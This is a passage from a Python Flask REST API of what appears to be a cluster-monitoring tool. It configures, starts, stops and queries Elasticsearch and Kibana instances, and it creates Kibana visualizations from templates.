esPIDFile.write(str(esPid))
esPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
response = jsonify({'Status': 'ElasticSearch Core PID ' + str(esPid)})
response.status_code = 200
return response
@dmon.route('/v2/overlord/core/es')
class ESCoreControllerInit(Resource):
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
esTemp = os.path.join(tmpDir, 'elasticsearch.tmp') # tmpDir+"/collectd.tmp"
esfConf = os.path.join(cfgDir, 'elasticsearch.yml')
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO -> curerntly only generates config file for master node
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
return response
# if checkPID(qESCore.ESCorePID) is True:
# subprocess.call(["kill", "-15", str(qESCore.ESCorePID)])
try:
template = templateEnv.get_template(esTemp)
except:
response = jsonify({'Status': 'Error', 'Message': 'Tempalte file unavailable!'})
response.status_code = 500
app.logger.error("[%s] : [ERROR] Cannot load es core template at location %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esTemp)
return response
infoESCore = {"clusterName": qESCore.clusterName, "nodeName": qESCore.nodeName, "esLogDir": logDir,
"MasterNode": qESCore.MasterNode, "DataNode": qESCore.DataNode,
"NumberOfShards": qESCore.NumOfShards, "NumberOfReplicas": qESCore.NumOfReplicas,
"IndexBufferSize": qESCore.IndexBufferSize,
"MinShardIndexBufferSize": qESCore.MinShardIndexBufferSize,
"MinIndexBufferSize": qESCore.MinIndexBufferSize,
"FieldDataCacheSize": qESCore.FieldDataCacheSize,
"FieldDataCacheExpires": qESCore.FieldDataCacheExpires,
"FieldDataCacheFilterSize": qESCore.FieldDataCacheFilterSize,
"FieldDataCacheFilterExpires": qESCore.FieldDataCacheFilterExpires,
"ESCoreDebug": qESCore.ESCoreDebug}
esConf = template.render(infoESCore)
qESCore.conf = esConf
# print >>sys.stderr, esConf
db.session.commit()
esCoreConf = open(esfConf, "w+")
esCoreConf.write(esConf)
esCoreConf.close()
# TODO find better solution
os.system('rm -rf /opt/elasticsearch/config/elasticsearch.yml')
os.system('cp ' + esfConf + ' /opt/elasticsearch/config/elasticsearch.yml ')
os.environ['ES_HEAP_SIZE'] = qESCore.ESCoreHeap
#check for running detached es core
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
else:
esPIDf = 0
if esPIDf != qESCore.ESCorePID:
app.logger.warning("[%s] : [WARN] Conflicting PID values found, detached pid -> %s, attached -> %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(esPIDf),
str(qESCore.ESCorePID))
if checkPID(qESCore.ESCorePID) is True:
try:
subprocess.check_call(["service", "dmon-es", "restart", qESCore.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart ES Core'})
response.status_code = 500
return response
esPID = check_proc_recursive(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCore.ESCorePID = esPID
qESCore.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Restarted', 'PID': esPID})
response.status_code = 201
return response
elif checkPID(int(esPIDf)) is True:
try:
subprocess.check_call(["service", "dmon-es", "restart", qESCore.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart detached ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart detached ES Core'})
response.status_code = 500
return response
esPID = check_proc(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCore.ESCorePID = esPID
qESCore.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Restarted and attached', 'PID': esPID})
response.status_code = 201
return response
else:
try:
subprocess.check_call(["service", "dmon-es", "start", qESCore.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start ES Core'})
response.status_code = 500
return response
esPID = check_proc(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCore.ESCorePID = esPID
qESCore.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Started', 'PID': esPID})
response.status_code = 201
return response
# response = jsonify({'Status': 'ElasticSearch Core PID ' + str(esPid)})
# response.status_code = 200
# return response
@dmon.route('/v2/overlord/core/es/<hostFQDN>/start')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStartInit(Resource):
def post(self, hostFQDN):
qESCoreStart = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
if qESCoreStart is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qESCoreStart.ESCorePID) is True:
proc = psutil.Process(qESCoreStart.ESCorePID)
if proc.status() == psutil.STATUS_ZOMBIE:
# print >> sys.stderr, 'Process ' + str(qESCoreStart.ESCorePID) + ' is zombie!'
app.logger.warning("[%s] : [WARN] Process %s is zombie!",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qESCoreStart.ESCorePID))
else:
app.logger.info("[%s] : [INFO] ES Core alredy running with pid %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qESCoreStart.ESCorePID))
response = jsonify({'Status': 'Detected ES Core instance', 'PID': qESCoreStart.ESCorePID})
response.status_code = 200
return response
os.environ['ES_HEAP_SIZE'] = qESCoreStart.ESCoreHeap
# check for running detached es core
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
else:
esPIDf = 0
if esPIDf != qESCoreStart.ESCorePID:
app.logger.warning("[%s] : [WARN] Conflicting PID values found, detached pid -> %s, attached -> %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(esPIDf),
str(qESCoreStart.ESCorePID))
elif checkPID(int(esPIDf)) is True:
app.logger.info("[%s] : [INFO] ES Core alredy running with detached pid %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qESCoreStart.ESCorePID))
response = jsonify({'Status': 'Detected detached ES Core instance', 'PID': esPIDf})
response.status_code = 200
return response
else:
try:
subprocess.check_call(["service", "dmon-es", "start", qESCoreStart.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start ES Core'})
response.status_code = 500
return response
esPID = check_proc(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCoreStart.ESCorePID = esPID
qESCoreStart.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Started', 'PID': esPID})
response.status_code = 201
return response
@dmon.route('/v2/overlord/core/es/<hostFQDN>/stop')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStopInit(Resource):
def post(self, hostFQDN):
qESCoreStop = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
if qESCoreStop is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
# check for running detached es core
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
else:
esPIDf = 0
if checkPID(qESCoreStop.ESCorePID) is True:
# os.kill(qESCoreStop.ESCorePID, signal.SIGTERM)
try:
subprocess.check_call(["service", "dmon-es", "stop"])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot stop ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot stop ES Core'})
response.status_code = 500
return response
qESCoreStop.ESCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped ES instance at ' + str(qESCoreStop.ESCorePID)})
app.logger.info('[%s] : [INFO] Stopped ES instance with pid %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qESCoreStop.ESCorePID)
response.status_code = 200
return response
elif checkPID(esPIDf) is True:
try:
subprocess.check_call(["service", "dmon-es", "stop"])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot stop detached ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot stop ES Core'})
response.status_code = 500
return response
qESCoreStop.ESCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped detached ES instance at ' + str(qESCoreStop.ESCorePID)})
app.logger.info('[%s] : [INFO] Stopped ES instance with pid %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qESCoreStop.ESCorePID)
response.status_code = 200
return response
else:
qESCoreStop.ESCoreStatus = 'unknown'
response = jsonify({'Status': 'No ES Instance Found',
'Message': 'No ES instance with PID ' + str(qESCoreStop.ESCorePID)})
response.status_code = 404
return response
@dmon.route('/v/overlord/core/es/status/<intComp>/property/<intProp>')
@api.doc(params={'intComp': 'ES specific component', 'intProp': 'Component specific property'})
class ESControllerStatus(Resource):
def get(self, intComp, intProp):
compList = ['cluster', 'shards']
propList = ['health', 'stats', 'pending_tasks', 'list']
if intComp not in compList:
response = jsonify({'Status': 'Invalid argument',
'Message': 'Argument ' + intComp + ' not supported'})
response.status_code = 400
return response
if intProp not in propList:
response = jsonify({'Status': 'Invalid argument',
'Message': 'Argument ' + intProp + ' not supported'})
response.status_code = 400
return response
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
return response
if intComp == 'cluster':
try:
esCoreUrl = 'http://%s:%s/%s/%s' % (qESCore.hostIP, qESCore.nodePort, '_cluster', intProp)
app.logger.info('[%s] : [INFO] ES Core Url set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esCoreUrl)
# print >> sys.stderr, esCoreUrl
r = requests.get(esCoreUrl, timeout=DMON_TIMEOUT) # timeout in seconds
data = r.json()
except:
app.logger.error('[%s] : [ERROR] Master ES instance unreachable at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esCoreUrl)
response = jsonify({"Error": "Master ES instances not reachable!"})
response.status_code = 500
return response
elif intComp == 'shards' and intProp == 'list':
try:
shardUrl = 'http://%s:%s/%s/%s' % (qESCore.hostIP, qESCore.nodePort, '_cat', intComp)
app.logger.info("[%s] : [INFO] Shard URL set to %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), shardUrl)
# print >> sys.stderr, shardUrl
r = requests.get(shardUrl, timeout=DMON_TIMEOUT)
data = r.text
except:
response = jsonify({"Error": "Master ES instances not reachable!"})
response.status_code = 500
return response
else:
response = jsonify({"Status": "Mallformed request"})
response.status_code = 400
return response
return data
@dmon.route('/v1/overlord/core/es/index/<index>')
class ESControllerIndex(Resource):
def get(self, index):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.getIndexSettings(index)
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get index settings'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/cluster/health')
class ESControllerClusterHealth(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.clusterHealth()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get cluster health'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/cluster/settings')
class ESControllerClusterSettings(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.clusterSettings()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get cluster settings'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/cluster/state')
class ESCOntrollerClusterState(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.clusterState()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get cluster state'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/node/master/info')
class ESControllerNodeInfo(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.nodeInfo()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get node info'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/node/master/state')
class ESControllerNodeState(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.nodeState()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get node state'})
response.status_code = 500
return response
# todo add node state and info for each registered node
@dmon.route('/v1/overlord/core/es/<hostFQDN>/status')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStatusSpecific(Resource):
def get(self, hostFQDN):
qESCoreStatus = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCoreStatus is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
pid = qESCoreStatus.ESCorePID
if not checkPID(pid):
if pid != 0:
qESCoreStatus.ESCoreStatus = 'Stopped'
else:
qESCoreStatus.ESCoreStatus = 'unknown'
response = jsonify({'Status': qESCoreStatus.ESCoreStatus,
'PID': qESCoreStatus.ESCorePID})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/es/<hostFQDN>/start')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStart(Resource):
def post(self, hostFQDN):
qESCoreStart = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCoreStart is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qESCoreStart.ESCorePID) is True:
proc = psutil.Process(qESCoreStart.ESCorePID)
if proc.status() == psutil.STATUS_ZOMBIE:
# print >> sys.stderr, 'Process ' + str(qESCoreStart.ESCorePID) + ' is zombie!'
app.logger.warning("[%s] : [WARN] Process %s is zombie!",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qESCoreStart.ESCorePID))
else:
response = jsonify({'Status': 'ES already Running',
'PID': str(qESCoreStart.ESCorePID)})
response.status_code = 200
return response
esPid = 0
try:
esPid = subprocess.Popen('/opt/elasticsearch/bin/elasticsearch',
stdout=subprocess.PIPE).pid # TODO: Try -p to set pid file location
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start ES core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'error', 'Message': 'Cannot start ES Core instance'})
response.status_code = 500
return response
# print >> sys.stderr, 'Error while starting elasticsearch'
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
qESCoreStart.ESCorePID = esPid
qESCoreStart.ESCoreStatus = 'Running'
# ES core pid location
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
try:
esPIDFile = open(pidESLoc, 'w+')
esPIDFile.write(str(esPid))
esPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
response = jsonify({'Status': 'ElasticSearch Core PID ' + str(esPid)})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/es/<hostFQDN>/stop')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStop(Resource):
def post(self, hostFQDN):
qESCoreStop = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCoreStop is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qESCoreStop.ESCorePID) is True:
os.kill(qESCoreStop.ESCorePID, signal.SIGTERM)
qESCoreStop.ESCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped ES instance at ' + str(qESCoreStop.ESCorePID)})
response.status_code = 200
return response
else:
qESCoreStop.ESCoreStatus = 'unknown'
response = jsonify({'Status': 'No ES Instance Found',
'Message': 'No ES instance with PID ' + str(qESCoreStop.ESCorePID)})
response.status_code = 404
return response
@dmon.route('/v1/overlord/core/kb/config')
class KBCoreConfiguration(Resource):
def get(self):
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
return response
if not os.path.isfile(os.path.join(cfgDir, 'kibana.yaml')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
lsCfgfile = open(os.path.join(cfgDir, 'kibana.yaml'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return send_file(lsCfgfile, mimetype='text/yaml', as_attachment=True)
@api.expect(kbCore) # TODO same for all 3 core services create one class for all
def put(self):
requiredKeys = ['HostFQDN', 'IP']
if not request.json:
abort(400)
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
return response
qKBCore = dbKBCore.query.filter_by(hostIP=request.json['IP']).first()
if request.json["OS"] is None:
os = "unknown"
else:
os = request.json["OS"]
if qKBCore is None:
upKB = dbKBCore(hostFQDN=request.json["HostFQDN"], hostIP=request.json["IP"],
hostOS=os, kbPort=request.json["KBPort"], KBCoreStatus='Stopped')
db.session.add(upKB)
db.session.commit()
response = jsonify({'Added': 'KB Config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
else:
qKBCore.hostOS = os
qKBCore.kbPort = request.json['KBPort']
db.session.commit()
response = jsonify({'Updated': 'KB config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/kb')
class KKCoreController(Resource):
def get(self):
KBhostsAll = db.session.query(dbKBCore.hostFQDN, dbKBCore.hostIP, dbKBCore.hostOS,
dbKBCore.kbPort, dbKBCore.KBCorePID, dbKBCore.KBCoreStatus).all()
resList = []
for hosts in KBhostsAll:
confDict = {}
confDict['HostFQDN'] = hosts[0]
confDict['IP'] = hosts[1]
confDict['OS'] = hosts[2]
confDict['KBPort'] = hosts[3]
if checkPID(hosts[4]):
confDict['Status'] = hosts[5]
confDict['PID'] = hosts[4]
else:
app.logger.warning('[%s] : KB Core service not found at PID %s, setting to failed',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(hosts[7]))
#hosts.ESCorePID = 0
#hosts.ESCoreStatus = 'unknown'
confDict['Status'] = 'failed' #TODO: Document failed message if PID is not assigned to an KB Instance
confDict['PID'] = 0
resList.append(confDict)
response = jsonify({'KB Instances': resList})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
kbTemp = os.path.join(tmpDir, 'kibana.tmp') # tmpDir+"/collectd.tmp"
kbfConf = os.path.join(cfgDir, 'kibana.yml')
qKBCore = dbKBCore.query.first()
if qKBCore is None:
response = jsonify({"Status": "No KB instance found!"})
response.status_code = 500
return response
if checkPID(qKBCore.KBCorePID) is True:
subprocess.call(["kill", "-9", str(qKBCore.KBCorePID)])
try:
template = templateEnv.get_template(kbTemp)
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable'})
response.status_code = 500
return response
# Log and PID location for kibana
kbPID = os.path.join(pidDir, 'kibana.pid')
kbLog = os.path.join(logDir, 'kibana.log')
infoKBCore = {"kbPort": qKBCore.kbPort, "kibanaPID": kbPID, "kibanaLog": kbLog}
kbConf = template.render(infoKBCore)
qKBCore.conf = kbConf
# print >>sys.stderr, esConf
db.session.commit()
kbCoreConf = open(kbfConf, "w+")
kbCoreConf.write(kbConf)
kbCoreConf.close()
# TODO find better solution
os.system('rm -rf /opt/kibana/config/kibana.yml')
os.system('cp ' + kbfConf + ' /opt/kibana/config/kibana.yml ')
kbPid = 0
FNULL = open(os.devnull, 'w')
try:
kbPid = subprocess.Popen('/opt/kibana/bin/kibana', stdout=FNULL, stderr=subprocess.STDOUT).pid
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Cannot start KB core service with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error', 'Message': 'Cannot start Kibana Core'})
response.status_code = 500
return response
qKBCore.KBCorePID = kbPid
qKBCore.KBCoreStatus = 'Running'
response = jsonify({'Status': 'Kibana Core PID ' + str(kbPid)})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/kb/visualisations')
class KBVisualisations(Resource):
def get(self):
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({'Status': 'ES Core not registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] ES Core not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
ecc = ESCoreConnector(esEndpoint=qESCore.hostIP, index='.kibana')
query = {"query": {"match_all": {}}, "size": 500}
rsp = ecc.aggQuery('.kibana', queryBody=query)
if not rsp:
app.logger.error('[%s] : [ERROR] ES Core unreachable',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'ES Core unreachable'})
response.status_code = 503
return response
foundv = []
for hits in rsp['hits']['hits']:
if hits['_type'] == 'visualisation':
foundv.append(hits['_source']['title'])
response = jsonify({'Visualisations': foundv})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
kbVisTemp = os.path.join(tmpDir, 'visualizations')
qNode = dbNodes.query.all()
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({'Status': 'ES Core not registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] ES Core not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nodeDict = {}
for nodes in qNode:
listRoles = nodes.nRoles.split(', ')
nodeDict[nodes.nodeFQDN] = {'IP': nodes.nodeIP, 'Roles': listRoles}
ecc = ESCoreConnector(esEndpoint=qESCore.hostIP, index='.kibana')
rsp = {}
listLoad = []
listMemory = []
listPackets = []
listOctets = []
listIfError = []
for node in nodeDict.keys():
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'load.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-CPU-Load" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listLoad.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listLoad.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'memory.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-Memory" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listMemory.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listMemory.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'packets.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-Packets" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listPackets.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listPackets.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'octets.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
if len(node.split('.')) == 1:
nodeIDName = node
else:
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-Octets" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listOctets.append(res["_id"])
except Exception as inst:
